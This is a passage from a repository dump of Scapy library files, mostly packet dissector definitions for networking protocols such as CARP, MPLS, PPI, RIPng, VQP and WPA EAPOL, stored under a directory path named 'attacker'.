| 6 : "OFDM 802.11g", 19 | 7 : "PBCC 802.11g", 20 | 8 : "OFDM 802.11a" } 21 | 22 | AVSWLANEncodingType = { 0 : "Unknown", 23 | 1 : "CCK", 24 | 2 : "PBCC", 25 | 3 : "OFDM"} 26 | 27 | AVSWLANSSIType = { 0 : "None", 28 | 1 : "Normalized RSSI", 29 | 2 : "dBm", 30 | 3 : "Raw RSSI"} 31 | 32 | AVSWLANPreambleType = { 0 : "Unknown", 33 | 1 : "Short", 34 | 2 : "Long" } 35 | 36 | 37 | class AVSWLANHeader(Packet): 38 | """ iwpriv eth1 set_prismhdr 1 """ 39 | name = "AVS WLAN Monitor Header" 40 | fields_desc = [ IntField("version",1), 41 | IntField("len",64), 42 | LongField("mactime",0), 43 | LongField("hosttime",0), 44 | IntEnumField("phytype",0, AVSWLANPhyType), 45 | IntField("channel",0), 46 | IntField("datarate",0), 47 | IntField("antenna",0), 48 | IntField("priority",0), 49 | IntEnumField("ssi_type",0, AVSWLANSSIType), 50 | SignedIntField("ssi_signal",0), 51 | SignedIntField("ssi_noise",0), 52 | IntEnumField("preamble",0, AVSWLANPreambleType), 53 | IntEnumField("encoding",0, AVSWLANEncodingType), 54 | ] 55 | 56 | bind_layers(AVSWLANHeader, Dot11) 57 | 58 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/carp.py: -------------------------------------------------------------------------------- 1 | 2 | # scapy.contrib.description = CARP 3 | # scapy.contrib.status = loads 4 | 5 | from scapy.packet import * 6 | from scapy.layers.inet import IP 7 | from scapy.fields import BitField, ByteField, XShortField, IntField, XIntField 8 | from scapy.utils import checksum 9 | import struct, hmac, hashlib 10 | 11 | class CARP(Packet): 12 | name = "CARP" 13 | fields_desc = [ BitField("version", 4, 4), 14 | BitField("type", 4, 4), 15 | ByteField("vhid", 1), 16 | ByteField("advskew", 0), 17 | ByteField("authlen", 0), 18 | ByteField("demotion", 0), 19 | ByteField("advbase", 0), 20 | XShortField("chksum", 0), 21 | XIntField("counter1", 0), 22 | XIntField("counter2", 0), 23 | XIntField("hmac1", 0), 24 | XIntField("hmac2", 0), 25 | XIntField("hmac3", 0), 26 | XIntField("hmac4", 0), 27 | XIntField("hmac5", 0) 28 | ] 29 | 30 | def post_build(self, pkt, pay): 31 | if self.chksum == None: 32 | pkt = pkt[:6] + struct.pack("!H", checksum(pkt)) + pkt[8:] 33 | 34 | return pkt 35 | 36 | def build_hmac_sha1(pkt, pw = '\0' * 20, ip4l = [], ip6l = []): 37 | if not pkt.haslayer(CARP): 38 | return None 39 | 40 | p = pkt[CARP] 41 | h = hmac.new(pw, digestmod = hashlib.sha1) 42 | # XXX: this is a dirty hack. it needs to pack version and type into a single 8bit field 43 | h.update('\x21') 44 | # XXX: mac addy if different from special link layer. comes before vhid 45 | h.update(struct.pack('!B', p.vhid)) 46 | 47 | sl = [] 48 | for i in ip4l: 49 | # sort ips from smallest to largest 50 | sl.append(inet_aton(i)) 51 | sl.sort() 52 | 53 | for i in sl: 54 | h.update(i) 55 | 56 | # XXX: do ip6l sorting 57 | 58 | return h.digest() 59 | 60 | """ 61 | XXX: Usually CARP is multicast to 224.0.0.18 but because of virtual setup, it'll 62 | be unicast between nodes. Uncomment the following line for normal use 63 | bind_layers(IP, CARP, proto=112, dst='224.0.0.18') 64 | """ 65 | bind_layers(IP, CARP, proto=112) 66 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/chdlc.py: -------------------------------------------------------------------------------- 1 | # http://trac.secdev.org/scapy/ticket/88 2 | 3 | # scapy.contrib.description = Cisco HDLC and SLARP 4 | # scapy.contrib.status = loads 5 | 6 | # This layer is based on information from http://www.nethelp.no/net/cisco-hdlc.txt 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.l2 import * 11 | from scapy.layers.inet import * 12 | from scapy.layers.inet6 import * 13 | 14 | class CHDLC(Packet): 15 | name = "Cisco HDLC" 16 | fields_desc = [ ByteEnumField("address", 0x0f, {0x0f : "unicast", 0x8f :"multicast"}), 17 | ByteField("control", 0), 18 | XShortField("proto", 0x0800)] 19 | 20 | class SLARP(Packet): 21 | name = "SLARP" 22 | fields_desc = [ IntEnumField("type", 2, {0 : "request", 1 : "reply", 2 :"line keepalive"}), 23 | ConditionalField(IPField("address", "192.168.0.1"), 24 | lambda pkt : pkt.type == 0 or pkt.type == 1), 25 | ConditionalField(IPField("mask", "255.255.255.0"), 26 | lambda pkt : pkt.type == 0 or pkt.type == 1), 27 | ConditionalField(XShortField("unused", 0), 28 | lambda pkt : pkt.type == 0 or pkt.type == 1), 29 | ConditionalField(IntField("mysequence", 0), 30 | lambda pkt : pkt.type == 2), 31 | ConditionalField(IntField("yoursequence", 0), 32 | lambda pkt : pkt.type == 2), 33 | ConditionalField(XShortField("reliability", 0xffff), 34 | lambda pkt : pkt.type == 2)] 35 | 36 | bind_layers( CHDLC, Dot3, proto=0x6558) 37 | bind_layers( CHDLC, IP, proto=0x800) 38 | bind_layers( CHDLC, IPv6, proto=0x86dd) 39 | bind_layers( CHDLC, SLARP, proto=0x8035) 40 | bind_layers( CHDLC, STP, proto=0x4242) 41 | 42 | conf.l2types.register(104, CHDLC) 43 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/etherip.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/297 3 | 4 | # scapy.contrib.description = EtherIP 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.fields import BitField 8 | from scapy.packet import Packet, bind_layers 9 | from scapy.layers.inet import IP 10 | from scapy.layers.l2 import Ether 11 | 12 | class EtherIP(Packet): 13 | name = "EtherIP / RFC 3378" 14 | fields_desc = [ BitField("version", 3, 4), 15 | BitField("reserved", 0, 12)] 16 | 17 | bind_layers( IP, EtherIP, frag=0, proto=0x61) 18 | bind_layers( EtherIP, Ether) 19 | 20 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/mpls.py: -------------------------------------------------------------------------------- 1 | # http://trac.secdev.org/scapy/ticket/31 2 | 3 | # scapy.contrib.description = MPLS 4 | # scapy.contrib.status = loads 5 | 6 | from scapy.packet import Packet,bind_layers 7 | from scapy.fields import BitField,ByteField 8 | from scapy.layers.l2 import Ether 9 | 10 | class MPLS(Packet): 11 | name = "MPLS" 12 | fields_desc = [ BitField("label", 3, 20), 13 | BitField("cos", 0, 3), 14 | BitField("s", 1, 1), 15 | ByteField("ttl", 0) ] 16 | 17 | bind_layers(Ether, MPLS, type=0x8847) 18 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/ppi.py: -------------------------------------------------------------------------------- 1 | ## This file is (hopefully) part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## 4 | ## This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.description = PPI 7 | # scapy.contrib.status = loads 8 | 9 | 10 | """ 11 | PPI (Per-Packet Information). 12 | """ 13 | import logging,struct 14 | from scapy.config import conf 15 | from scapy.packet import * 16 | from scapy.fields import * 17 | from scapy.layers.l2 import Ether 18 | from scapy.layers.dot11 import Dot11 19 | 20 | # Dictionary to map the TLV type to the class name of a sub-packet 21 | _ppi_types = {} 22 | def addPPIType(id, value): 23 | _ppi_types[id] = value 24 | def getPPIType(id, default="default"): 25 | return _ppi_types.get(id, _ppi_types.get(default, None)) 26 | 27 | 28 | # Default PPI Field Header 29 | class PPIGenericFldHdr(Packet): 30 | name = "PPI Field Header" 31 | fields_desc = [ LEShortField('pfh_type', 0), 32 | FieldLenField('pfh_length', None, length_of="value", fmt='= 4: 47 | t,pfh_len = struct.unpack(" pfh_len): 56 | out.payload.payload = conf.padding_layer(p[pfh_len:]) 57 | elif (len(p) > pfh_len): 58 | out.payload = conf.padding_layer(p[pfh_len:]) 59 | 60 | else: 61 | out = conf.raw_layer(p, **kargs) 62 | return out 63 | 64 | 65 | 66 | 67 | class PPI(Packet): 68 | name = "PPI Packet Header" 69 | fields_desc = [ ByteField('pph_version', 0), 70 | ByteField('pph_flags', 0), 71 | FieldLenField('pph_len', None, length_of="PPIFieldHeaders", fmt=" 4 | ## This program is published under a GPLv2 license 5 | 6 | # scapy.contrib.description = PPI CACE 7 | # scapy.contrib.status = loads 8 | 9 | """ 10 | CACE PPI types 11 | """ 12 | import logging,struct 13 | from scapy.config import conf 14 | from scapy.packet import * 15 | from scapy.fields import * 16 | from scapy.layers.l2 import Ether 17 | from scapy.layers.dot11 import Dot11 18 | from scapy.contrib.ppi import * 19 | 20 | PPI_DOT11COMMON = 2 21 | PPI_DOT11NMAC = 3 22 | PPI_DOT11NMACPHY = 4 23 | PPI_SPECTRUMMAP = 5 24 | PPI_PROCESSINFO = 6 25 | PPI_CAPTUREINFO = 7 26 | PPI_AGGREGATION = 8 27 | PPI_DOT3 = 9 28 | 29 | # PPI 802.11 Common Field Header Fields 30 | class dBmByteField(Field): 31 | def __init__(self, name, default): 32 | Field.__init__(self, name, default, "b") 33 | def i2repr(self, pkt, val): 34 | if (val != None): 35 | val = "%4d dBm" % val 36 | return val 37 | 38 | class PPITSFTField(LELongField): 39 | def i2h(self, pkt, val): 40 | flags = 0 41 | if (pkt): 42 | flags = pkt.getfieldval("Pkt_Flags") 43 | if not flags: 44 | flags = 0 45 | if (flags & 0x02): 46 | scale = 1e-3 47 | else: 48 | scale = 1e-6 49 | tout = scale * float(val) 50 | return tout 51 | def h2i(self, pkt, val): 52 | scale = 1e6 53 | if pkt: 54 | flags = pkt.getfieldval("Pkt_Flags") 55 | if flags: 56 | if (flags & 0x02): 57 | scale = 1e3 58 | tout = int((scale * val) + 0.5) 59 | return tout 60 | 61 | _PPIDot11CommonChFlags = ['','','','','Turbo','CCK','OFDM','2GHz','5GHz', 62 | 'PassiveOnly','Dynamic CCK-OFDM','GSFK'] 63 | 64 | _PPIDot11CommonPktFlags = ['FCS','TSFT_ms','FCS_Invalid','PHY_Error'] 65 | 66 | # PPI 802.11 Common Field Header 67 | class Dot11Common(Packet): 68 | name = "PPI 802.11-Common" 69 | fields_desc = [ LEShortField('pfh_type',PPI_DOT11COMMON), 70 | LEShortField('pfh_length', 20), 71 | PPITSFTField('TSF_Timer', 0), 72 | FlagsField('Pkt_Flags',0, -16, _PPIDot11CommonPktFlags), 73 | LEShortField('Rate',0), 74 | LEShortField('Ch_Freq',0), 75 | FlagsField('Ch_Flags', 0, -16, _PPIDot11CommonChFlags), 76 | ByteField('FHSS_Hop',0), 77 | ByteField('FHSS_Pat',0), 78 | dBmByteField('Antsignal',-128), 79 | dBmByteField('Antnoise',-128)] 80 | 81 | def extract_padding(self, p): 82 | return "",p 83 | #Hopefully other CACE defined types will be added here. 84 | 85 | #Add the dot11common layer to the PPI array 86 | addPPIType(PPI_DOT11COMMON, Dot11Common) 87 | 88 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/ripng.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # http://trac.secdev.org/scapy/ticket/301 4 | 5 | # scapy.contrib.description = RIPng 6 | # scapy.contrib.status = loads 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.inet import UDP 11 | from scapy.layers.inet6 import * 12 | 13 | class RIPng(Packet): 14 | name = "RIPng header" 15 | fields_desc = [ 16 | ByteEnumField("cmd", 1, {1 : "req", 2 : "resp"}), 17 | ByteField("ver", 1), 18 | ShortField("null", 0), 19 | ] 20 | 21 | class RIPngEntry(Packet): 22 | name = "RIPng entry" 23 | fields_desc = [ 24 | ConditionalField(IP6Field("prefix", "::"), 25 | lambda pkt: pkt.metric != 255), 26 | ConditionalField(IP6Field("nexthop", "::"), 27 | lambda pkt: pkt.metric == 255), 28 | ShortField("routetag", 0), 29 | ByteField("prefixlen", 0), 30 | ByteEnumField("metric", 1, {16 : "Unreach", 31 | 255 : "next-hop entry"}) 32 | ] 33 | 34 | bind_layers(UDP, RIPng, sport=521, dport=521) 35 | bind_layers(RIPng, RIPngEntry) 36 | bind_layers(RIPngEntry, RIPngEntry) 37 | 38 | if __name__ == "__main__": 39 | from scapy.main import interact 40 | interact(mydict=globals(), mybanner="RIPng") 41 | 42 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/vqp.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/147 3 | 4 | # scapy.contrib.description = VLAN Query Protocol 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.inet import UDP 10 | 11 | class VQP(Packet): 12 | name = "VQP" 13 | fields_desc = [ 14 | ByteField("const", 1), 15 | ByteEnumField("type", 1, { 16 | 1:"requestPort", 2:"responseVLAN", 17 | 3:"requestReconfirm", 4:"responseReconfirm" 18 | }), 19 | ByteEnumField("errorcodeaction", 0, { 20 | 0:"none",3:"accessDenied", 21 | 4:"shutdownPort", 5:"wrongDomain" 22 | }), 23 | ByteEnumField("unknown", 2, { 24 | 2:"inGoodResponse", 6:"inRequests" 25 | }), 26 | IntField("seq",0), 27 | ] 28 | 29 | class VQPEntry(Packet): 30 | name = "VQPEntry" 31 | fields_desc = [ 32 | IntEnumField("datatype", 0, { 33 | 3073:"clientIPAddress", 3074:"portName", 34 | 3075:"VLANName", 3076:"Domain", 3077:"ethernetPacket", 35 | 3078:"ReqMACAddress", 3079:"unknown", 36 | 3080:"ResMACAddress" 37 | }), 38 | FieldLenField("len", None), 39 | ConditionalField(IPField("datatom", "0.0.0.0"), 40 | lambda p:p.datatype==3073), 41 | ConditionalField(MACField("data", "00:00:00:00:00:00"), 42 | lambda p:p.datatype==3078), 43 | ConditionalField(MACField("data", "00:00:00:00:00:00"), 44 | lambda p:p.datatype==3080), 45 | ConditionalField(StrLenField("data", None, 46 | length_from=lambda p:p.len), 47 | lambda p:p.datatype not in [3073, 3078, 3080]), 48 | ] 49 | def post_build(self, p, pay): 50 | if self.len is None: 51 | l = len(p.data) 52 | p = p[:2]+struct.pack("!H",l)+p[4:] 53 | return p 54 | 55 | bind_layers(UDP, VQP, sport=1589) 56 | bind_layers(UDP, VQP, dport=1589) 57 | bind_layers(VQP, VQPEntry, ) 58 | bind_layers(VQPEntry, VQPEntry, ) 59 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/contrib/wpa_eapol.py: -------------------------------------------------------------------------------- 1 | 2 | # http://trac.secdev.org/scapy/ticket/104 3 | 4 | # scapy.contrib.description = WPA EAPOL dissector 5 | # scapy.contrib.status = loads 6 | 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.l2 import * 10 | 11 | class WPA_key(Packet): 12 | name = "WPA_key" 13 | fields_desc = [ ByteField("descriptor_type", 1), 14 | ShortField("key_info",0), 15 | LenField("len", None, "H"), 16 | StrFixedLenField("replay_counter", "", 8), 17 | StrFixedLenField("nonce", "", 32), 18 | StrFixedLenField("key_iv", "", 16), 19 | StrFixedLenField("wpa_key_rsc", "", 8), 20 | StrFixedLenField("wpa_key_id", "", 8), 21 | StrFixedLenField("wpa_key_mic", "", 16), 22 | LenField("wpa_key_length", None, "H"), 23 | StrLenField("wpa_key", "", length_from=lambda pkt:pkt.wpa_key_length) ] 24 | def extract_padding(self, s): 25 | l = self.len 26 | return s[:l],s[l:] 27 | def hashret(self): 28 | return chr(self.type)+self.payload.hashret() 29 | def answers(self, other): 30 | if isinstance(other,WPA_key): 31 | return 1 32 | return 0 33 | 34 | 35 | bind_layers( EAPOL, WPA_key, type=3) 36 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/crypto/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Arnaud Ebalard 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Tools for handling with digital certificates. 8 | """ 9 | 10 | try: 11 | import Crypto 12 | except ImportError: 13 | import logging 14 | log_loading = logging.getLogger("scapy.loading") 15 | log_loading.info("Can't import python Crypto lib. Disabled certificate manipulation tools") 16 | else: 17 | from scapy.crypto.cert import * 18 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/dadict.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Direct Access dictionary. 8 | """ 9 | 10 | from error import Scapy_Exception 11 | 12 | ############################### 13 | ## Direct Access dictionnary ## 14 | ############################### 15 | 16 | def fixname(x): 17 | if x and x[0] in "0123456789": 18 | x = "n_"+x 19 | return x.translate("________________________________________________0123456789_______ABCDEFGHIJKLMNOPQRSTUVWXYZ______abcdefghijklmnopqrstuvwxyz_____________________________________________________________________________________________________________________________________") 20 | 21 | 22 | class DADict_Exception(Scapy_Exception): 23 | pass 24 | 25 | class DADict: 26 | def __init__(self, _name="DADict", **kargs): 27 | self._name=_name 28 | self.__dict__.update(kargs) 29 | def fixname(self,val): 30 | return fixname(val) 31 | def __contains__(self, val): 32 | return val in self.__dict__ 33 | def __getitem__(self, attr): 34 | return getattr(self, attr) 35 | def __setitem__(self, attr, val): 36 | return setattr(self, self.fixname(attr), val) 37 | def __iter__(self): 38 | return iter(map(lambda (x,y):y,filter(lambda (x,y):x and x[0]!="_", self.__dict__.items()))) 39 | def _show(self): 40 | for k in self.__dict__.keys(): 41 | if k and k[0] != "_": 42 | print "%10s = %r" % (k,getattr(self,k)) 43 | def __repr__(self): 44 | return "<%s/ %s>" % (self._name," ".join(filter(lambda x:x and x[0]!="_",self.__dict__.keys()))) 45 | 46 | def _branch(self, br, uniq=0): 47 | if uniq and br._name in self: 48 | raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name)) 49 | self[br._name] = br 50 | 51 | def _my_find(self, *args, **kargs): 52 | if args and self._name not in args: 53 | return False 54 | for k in kargs: 55 | if k not in self or self[k] != kargs[k]: 56 | return False 57 | return True 58 | 59 | def _find(self, *args, **kargs): 60 | return self._recurs_find((), *args, **kargs) 61 | def _recurs_find(self, path, *args, **kargs): 62 | if self in path: 63 | return None 64 | if self._my_find(*args, **kargs): 65 | return self 66 | for o in self: 67 | if isinstance(o, DADict): 68 | p = o._recurs_find(path+(self,), *args, **kargs) 69 | if p is not None: 70 | return p 71 | return None 72 | def _find_all(self, *args, **kargs): 73 | return self._recurs_find_all((), *args, **kargs) 74 | def _recurs_find_all(self, path, *args, **kargs): 75 | r = [] 76 | if self in path: 77 | return r 78 | if self._my_find(*args, **kargs): 79 | r.append(self) 80 | for o in self: 81 | if isinstance(o, DADict): 82 | p = o._recurs_find_all(path+(self,), *args, **kargs) 83 | r += p 84 | return r 85 | def keys(self): 86 | return filter(lambda x:x and x[0]!="_", self.__dict__.keys()) 87 | 88 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/error.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Logging subsystem and basic exception class. 8 | """ 9 | 10 | ############################# 11 | ##### Logging subsystem ##### 12 | ############################# 13 | 14 | class Scapy_Exception(Exception): 15 | pass 16 | 17 | import logging,traceback,time 18 | 19 | class ScapyFreqFilter(logging.Filter): 20 | def __init__(self): 21 | logging.Filter.__init__(self) 22 | self.warning_table = {} 23 | def filter(self, record): 24 | from config import conf 25 | wt = conf.warning_threshold 26 | if wt > 0: 27 | stk = traceback.extract_stack() 28 | caller=None 29 | for f,l,n,c in stk: 30 | if n == 'warning': 31 | break 32 | caller = l 33 | tm,nb = self.warning_table.get(caller, (0,0)) 34 | ltm = time.time() 35 | if ltm-tm > wt: 36 | tm = ltm 37 | nb = 0 38 | else: 39 | if nb < 2: 40 | nb += 1 41 | if nb == 2: 42 | record.msg = "more "+record.msg 43 | else: 44 | return 0 45 | self.warning_table[caller] = (tm,nb) 46 | return 1 47 | 48 | log_scapy = logging.getLogger("scapy") 49 | console_handler = logging.StreamHandler() 50 | console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s")) 51 | log_scapy.addHandler(console_handler) 52 | log_runtime = logging.getLogger("scapy.runtime") # logs at runtime 53 | log_runtime.addFilter(ScapyFreqFilter()) 54 | log_interactive = logging.getLogger("scapy.interactive") # logs in interactive functions 55 | log_loading = logging.getLogger("scapy.loading") # logs when loading scapy 56 | 57 | 58 | def warning(x): 59 | log_runtime.warning(x) 60 | 61 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Layer package. 8 | """ 9 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | All layers. Configurable with conf.load_layers. 8 | """ 9 | 10 | from scapy.config import conf 11 | from scapy.error import log_loading 12 | import logging 13 | log = logging.getLogger("scapy.loading") 14 | 15 | def _import_star(m): 16 | mod = __import__(m, globals(), locals()) 17 | for k,v in mod.__dict__.iteritems(): 18 | globals()[k] = v 19 | 20 | for _l in conf.load_layers: 21 | log_loading.debug("Loading layer %s" % _l) 22 | try: 23 | _import_star(_l) 24 | except Exception,e: 25 | log.warning("can't import layer %s: %s" % (_l,e)) 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/gprs.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | GPRS (General Packet Radio Service) for mobile data communication. 8 | """ 9 | 10 | from scapy.fields import * 11 | from scapy.packet import * 12 | from scapy.layers.inet import IP 13 | 14 | class GPRS(Packet): 15 | name = "GPRSdummy" 16 | fields_desc = [ 17 | StrStopField("dummy","","\x65\x00\x00",1) 18 | ] 19 | 20 | 21 | bind_layers( GPRS, IP, ) 22 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/ir.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | IrDA infrared data communication. 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.l2 import CookedLinux 13 | 14 | 15 | 16 | # IR 17 | 18 | class IrLAPHead(Packet): 19 | name = "IrDA Link Access Protocol Header" 20 | fields_desc = [ XBitField("Address", 0x7f, 7), 21 | BitEnumField("Type", 1, 1, {"Response":0, 22 | "Command":1})] 23 | 24 | class IrLAPCommand(Packet): 25 | name = "IrDA Link Access Protocol Command" 26 | fields_desc = [ XByteField("Control", 0), 27 | XByteField("Format identifier", 0), 28 | XIntField("Source address", 0), 29 | XIntField("Destination address", 0xffffffffL), 30 | XByteField("Discovery flags", 0x1), 31 | ByteEnumField("Slot number", 255, {"final":255}), 32 | XByteField("Version", 0)] 33 | 34 | 35 | class IrLMP(Packet): 36 | name = "IrDA Link Management Protocol" 37 | fields_desc = [ XShortField("Service hints", 0), 38 | XByteField("Character set", 0), 39 | StrField("Device name", "") ] 40 | 41 | 42 | bind_layers( CookedLinux, IrLAPHead, proto=23) 43 | bind_layers( IrLAPHead, IrLAPCommand, Type=1) 44 | bind_layers( IrLAPCommand, IrLMP, ) 45 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/l2tp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | L2TP (Layer 2 Tunneling Protocol) for VPNs. 8 | 9 | [RFC 2661] 10 | """ 11 | 12 | import struct 13 | 14 | from scapy.packet import * 15 | from scapy.fields import * 16 | from scapy.layers.inet import UDP 17 | from scapy.layers.ppp import PPP 18 | 19 | class L2TP(Packet): 20 | fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}), 21 | ShortField("len", None), 22 | ShortField("tunnel_id", 0), 23 | ShortField("session_id", 0), 24 | ShortField("ns", 0), 25 | ShortField("nr", 0), 26 | ShortField("offset", 0) ] 27 | 28 | def post_build(self, pkt, pay): 29 | if self.len is None: 30 | l = len(pkt)+len(pay) 31 | pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:] 32 | return pkt+pay 33 | 34 | 35 | bind_layers( UDP, L2TP, sport=1701, dport=1701) 36 | bind_layers( L2TP, PPP, ) 37 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/llmnr.py: -------------------------------------------------------------------------------- 1 | from scapy.fields import * 2 | from scapy.packet import * 3 | from scapy.layers.inet import UDP 4 | from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField 5 | 6 | """ 7 | LLMNR (Link Local Multicast Node Resolution). 8 | 9 | [RFC 4795] 10 | """ 11 | 12 | ############################################################################# 13 | ### LLMNR (RFC4795) ### 14 | ############################################################################# 15 | # LLMNR is based on the DNS packet format (RFC1035 Section 4) 16 | # RFC also envisions LLMNR over TCP. Like vista, we don't support it -- arno 17 | 18 | _LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3" 19 | _LLMNR_IPv4_mcast_addr = "224.0.0.252" 20 | 21 | class LLMNRQuery(Packet): 22 | name = "Link Local Multicast Node Resolution - Query" 23 | fields_desc = [ ShortField("id", 0), 24 | BitField("qr", 0, 1), 25 | BitEnumField("opcode", 0, 4, { 0:"QUERY" }), 26 | BitField("c", 0, 1), 27 | BitField("tc", 0, 2), 28 | BitField("z", 0, 4), 29 | BitEnumField("rcode", 0, 4, { 0:"ok" }), 30 | DNSRRCountField("qdcount", None, "qd"), 31 | DNSRRCountField("ancount", None, "an"), 32 | DNSRRCountField("nscount", None, "ns"), 33 | DNSRRCountField("arcount", None, "ar"), 34 | DNSQRField("qd", "qdcount"), 35 | DNSRRField("an", "ancount"), 36 | DNSRRField("ns", "nscount"), 37 | DNSRRField("ar", "arcount",0)] 38 | overload_fields = {UDP: {"sport": 5355, "dport": 5355 }} 39 | def hashret(self): 40 | return struct.pack("!H", self.id) 41 | 42 | class LLMNRResponse(LLMNRQuery): 43 | name = "Link Local Multicast Node Resolution - Response" 44 | qr = 1 45 | def answers(self, other): 46 | return (isinstance(other, LLMNRQuery) and 47 | self.id == other.id and 48 | self.qr == 1 and 49 | other.qr == 0) 50 | 51 | def _llmnr_dispatcher(x, *args, **kargs): 52 | cls = conf.raw_layer 53 | if len(x) >= 3: 54 | if (ord(x[4]) & 0x80): # Response 55 | cls = LLMNRResponse 56 | else: # Query 57 | cls = LLMNRQuery 58 | return cls(x, *args, **kargs) 59 | 60 | bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 }) 61 | bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 }) 62 | 63 | # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista."))) 64 | 65 | 66 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/mgcp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | MGCP (Media Gateway Control Protocol) 8 | 9 | [RFC 2805] 10 | """ 11 | 12 | from scapy.packet import * 13 | from scapy.fields import * 14 | from scapy.layers.inet import UDP 15 | 16 | class MGCP(Packet): 17 | name = "MGCP" 18 | longname = "Media Gateway Control Protocol" 19 | fields_desc = [ StrStopField("verb","AUEP"," ", -1), 20 | StrFixedLenField("sep1"," ",1), 21 | StrStopField("transaction_id","1234567"," ", -1), 22 | StrFixedLenField("sep2"," ",1), 23 | StrStopField("endpoint","dummy@dummy.net"," ", -1), 24 | StrFixedLenField("sep3"," ",1), 25 | StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1), 26 | StrFixedLenField("sep4","\x0a",1), 27 | ] 28 | 29 | 30 | #class MGCP(Packet): 31 | # name = "MGCP" 32 | # longname = "Media Gateway Control Protocol" 33 | # fields_desc = [ ByteEnumField("type",0, ["request","response","others"]), 34 | # ByteField("code0",0), 35 | # ByteField("code1",0), 36 | # ByteField("code2",0), 37 | # ByteField("code3",0), 38 | # ByteField("code4",0), 39 | # IntField("trasid",0), 40 | # IntField("req_time",0), 41 | # ByteField("is_duplicate",0), 42 | # ByteField("req_available",0) ] 43 | # 44 | bind_layers( UDP, MGCP, dport=2727) 45 | bind_layers( UDP, MGCP, sport=2727) 46 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/mobileip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Mobile IP. 8 | """ 9 | 10 | from scapy.fields import * 11 | from scapy.packet import * 12 | from scapy.layers.inet import IP,UDP 13 | 14 | 15 | class MobileIP(Packet): 16 | name = "Mobile IP 